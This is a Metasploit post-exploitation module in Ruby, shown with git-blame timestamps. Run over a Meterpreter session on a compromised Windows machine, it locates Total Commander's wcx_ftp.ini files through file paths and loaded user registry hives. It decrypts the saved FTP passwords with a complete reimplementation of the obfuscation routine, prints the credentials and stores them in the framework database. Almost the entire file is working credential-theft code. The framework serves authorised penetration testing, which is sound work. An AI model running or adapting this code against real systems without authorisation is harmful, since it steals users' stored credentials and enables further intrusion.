2011-06-02 00:20:41 +00:00
|
|
|
# $Id$
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'rex/parser/ini'
|
2011-07-28 12:35:50 +00:00
|
|
|
require 'msf/core/post/windows/user_profiles'
|
2011-06-02 00:20:41 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
2011-06-21 00:38:04 +00:00
|
|
|
include Msf::Post::Windows::Registry
|
2011-06-02 00:20:41 +00:00
|
|
|
include Msf::Auxiliary::Report
|
2011-07-28 12:35:50 +00:00
|
|
|
include Msf::Post::Windows::UserProfiles
|
|
|
|
|
2011-06-02 00:20:41 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Windows Gather Total Commander Saved Password Extraction',
|
2011-10-17 03:49:49 +00:00
|
|
|
'Description' => %q{
|
2011-07-28 12:35:50 +00:00
|
|
|
This module extracts weakly encrypted saved FTP Passwords from Total Commander.
|
|
|
|
It finds saved FTP connections in the wcx_ftp.ini file.
|
|
|
|
},
|
2011-06-02 00:20:41 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2011-07-22 20:09:26 +00:00
|
|
|
'Author' => [ 'TheLightCosine <thelightcosine[at]gmail.com>'],
|
2011-06-02 00:20:41 +00:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Platform' => [ 'windows' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
print_status("Checking Default Locations...")
|
|
|
|
check_systemroot
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-07-28 12:35:50 +00:00
|
|
|
grab_user_profiles().each do |user|
|
|
|
|
next if user['AppData'] == nil
|
|
|
|
next if user['ProfileDir'] == nil
|
|
|
|
check_userdir(user['ProfileDir'])
|
|
|
|
check_appdata(user['AppData'])
|
2011-06-02 00:20:41 +00:00
|
|
|
end
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-07-28 12:35:50 +00:00
|
|
|
commander_key = "HKLM\\Software\\Ghisler\\Total Commander"
|
|
|
|
hklmpath = registry_getvaldata(commander_key, 'FtpIniName')
|
2011-06-02 00:20:41 +00:00
|
|
|
case hklmpath
|
|
|
|
when nil
|
|
|
|
print_status("Total Commander Does not Appear to be Installed Globally")
|
|
|
|
when "wcx_ftp.ini"
|
|
|
|
print_status("Already Checked SYSTEMROOT")
|
|
|
|
when ".\\wcx_ftp.ini"
|
2011-07-28 12:35:50 +00:00
|
|
|
hklminstpath = registry_getvaldata(commander_key, 'InstallDir')
|
2011-06-02 00:20:41 +00:00
|
|
|
check_other(hklminstpath +'\\wcx_ftp.ini')
|
|
|
|
when /APPDATA/
|
|
|
|
print_status("Already Checked AppData")
|
|
|
|
when /USERPROFILE/
|
|
|
|
print_status("Already Checked USERPROFILE")
|
|
|
|
else
|
|
|
|
check_other(hklmpath)
|
|
|
|
end
|
|
|
|
|
2011-07-28 12:35:50 +00:00
|
|
|
userhives=load_missing_hives()
|
|
|
|
userhives.each do |hive|
|
2011-10-17 03:49:49 +00:00
|
|
|
next if hive['HKU'] == nil
|
2011-07-28 12:35:50 +00:00
|
|
|
print_status("Looking at Key #{hive['HKU']}")
|
|
|
|
profile_commander_key = "#{hive['HKU']}\\Software\\Ghisler\\Total Commander"
|
|
|
|
hkupath = registry_getvaldata(profile_commander_key, 'FtpIniName')
|
2011-06-02 00:20:41 +00:00
|
|
|
print_status("HKUP: #{hkupath}")
|
|
|
|
case hkupath
|
|
|
|
when nil
|
2011-07-28 12:35:50 +00:00
|
|
|
print_status("Total Commander Does not Appear to be Installed on This User")
|
2011-06-02 00:20:41 +00:00
|
|
|
when "wcx_ftp.ini"
|
|
|
|
print_status("Already Checked SYSTEMROOT")
|
|
|
|
when ".\\wcx_ftp.ini"
|
2011-07-28 12:35:50 +00:00
|
|
|
hklminstpath = registry_getvaldata(profile_commander_key, 'InstallDir')
|
2011-06-02 00:20:41 +00:00
|
|
|
check_other(hklminstpath +'\\wcx_ftp.ini')
|
|
|
|
when /APPDATA/
|
|
|
|
print_status("Already Checked AppData")
|
|
|
|
|
|
|
|
when /USERPROFILE/
|
|
|
|
print_status("Already Checked USERPROFILE")
|
|
|
|
else
|
|
|
|
check_other(hkupath)
|
|
|
|
end
|
|
|
|
end
|
2011-07-28 12:35:50 +00:00
|
|
|
unload_our_hives(userhives)
|
2011-06-02 00:20:41 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def check_userdir(path)
|
|
|
|
filename= "#{path}wcx_ftp.ini"
|
|
|
|
begin
|
|
|
|
iniexists = client.fs.file.stat(filename)
|
|
|
|
print_status("Found File at #{filename}")
|
2011-11-06 22:02:26 +00:00
|
|
|
get_ini(filename)
|
2011-06-02 00:20:41 +00:00
|
|
|
|
|
|
|
rescue
|
|
|
|
print_status("#{filename} not found ....")
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def check_appdata(path)
|
2011-07-28 12:35:50 +00:00
|
|
|
filename= "#{path}\\GHISLER\\wcx_ftp.ini"
|
2011-06-02 00:20:41 +00:00
|
|
|
begin
|
|
|
|
iniexists = client.fs.file.stat(filename)
|
|
|
|
print_status("Found File at #{filename}")
|
2011-11-06 22:02:26 +00:00
|
|
|
get_ini(filename)
|
2011-06-02 00:20:41 +00:00
|
|
|
|
|
|
|
rescue
|
|
|
|
print_status("#{filename} not found ....")
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def check_systemroot
|
|
|
|
winpath= client.fs.file.expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
|
|
|
|
begin
|
|
|
|
iniexists = client.fs.file.stat(winpath)
|
|
|
|
print_status("Found File at #{winpath}")
|
|
|
|
get_ini(winpath)
|
|
|
|
rescue
|
|
|
|
print_status("#{winpath} not found ....")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def check_other(filename)
|
|
|
|
begin
|
|
|
|
iniexists = client.fs.file.stat(filename)
|
|
|
|
print_status("Found File at #{filename}")
|
2011-11-06 22:02:26 +00:00
|
|
|
get_ini(filename)
|
2011-06-02 00:20:41 +00:00
|
|
|
|
|
|
|
rescue
|
|
|
|
print_status("#{filename} not found ....")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_ini(filename)
|
|
|
|
config = client.fs.file.new(filename,'r')
|
|
|
|
parse = config.read
|
|
|
|
ini=Rex::Parser::Ini.from_s(parse)
|
|
|
|
|
|
|
|
ini.each_key do |group|
|
|
|
|
next if group=="General" or group == "default" or group=="connections"
|
|
|
|
print_status("Processing Saved Session #{group}")
|
|
|
|
host = ini[group]['host']
|
|
|
|
|
|
|
|
username = ini[group]['username']
|
|
|
|
passwd = ini[group]['password']
|
|
|
|
next if passwd==nil
|
|
|
|
passwd = decrypt(passwd)
|
|
|
|
(host,port) = host.split(':')
|
|
|
|
port=21 if port==nil
|
|
|
|
print_good("*** Host: #{host} Port: #{port} User: #{username} Password: #{passwd} ***")
|
|
|
|
report_auth_info(
|
|
|
|
:host => host,
|
|
|
|
:port => port,
|
|
|
|
:sname => 'FTP',
|
2011-11-08 03:34:49 +00:00
|
|
|
:source_id => session.db_record.id,
|
|
|
|
:source_type => "exploit",
|
2011-06-02 00:20:41 +00:00
|
|
|
:user => username,
|
|
|
|
:pass => passwd
|
|
|
|
)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def seed(nMax)
|
2011-10-17 03:49:49 +00:00
|
|
|
@vseed = ((@vseed * 0x8088405) & 0xffffffff) +1
|
2011-06-02 00:20:41 +00:00
|
|
|
return (((@vseed * nMax) >> 32)& 0xffffffff)
|
|
|
|
end
|
|
|
|
|
|
|
|
def shift(n1, n2)
|
|
|
|
first= (n1 << n2) & 0xffffffff
|
2011-11-06 22:02:26 +00:00
|
|
|
second = (n1 >> (8 - n2)) & 0xffffffff
|
2011-06-02 00:20:41 +00:00
|
|
|
retval= (first | second) & 0xff
|
|
|
|
return retval
|
|
|
|
end
|
|
|
|
|
|
|
|
def decrypt(pwd)
|
|
|
|
|
|
|
|
pwd2=[]
|
|
|
|
|
|
|
|
pwd.scan(/../) { |a| pwd2 << (a.to_i 16) }
|
|
|
|
|
|
|
|
len= (pwd2.length) -4
|
|
|
|
|
|
|
|
pwd3=[]
|
|
|
|
@vseed = 849521
|
2011-10-17 03:49:49 +00:00
|
|
|
pwd2.each do |a|
|
2011-06-02 00:20:41 +00:00
|
|
|
blah = seed(8)
|
|
|
|
blah2 = shift(a, blah)
|
|
|
|
pwd3 << blah2
|
|
|
|
end
|
|
|
|
|
|
|
|
@vseed =12345
|
|
|
|
(0..255).each do |i|
|
|
|
|
a=seed(len)
|
|
|
|
b=seed(len)
|
|
|
|
t=pwd3[a]
|
2011-11-06 22:02:26 +00:00
|
|
|
pwd3[a] = pwd3[b]
|
2011-06-02 00:20:41 +00:00
|
|
|
pwd3[b]=t
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
@vseed =42340
|
|
|
|
(0..len).each do |i|
|
|
|
|
pwd3[i] = (pwd3[i] ^ seed(256)) & 0xff
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
@vseed =54321
|
|
|
|
(0..len).each do |i|
|
|
|
|
foo = seed(256)
|
|
|
|
pwd3[i] = (pwd3[i] - foo) & 0xff
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
fpwd=""
|
|
|
|
pwd3[0,len].map{|a| fpwd << a.chr}
|
|
|
|
return fpwd
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|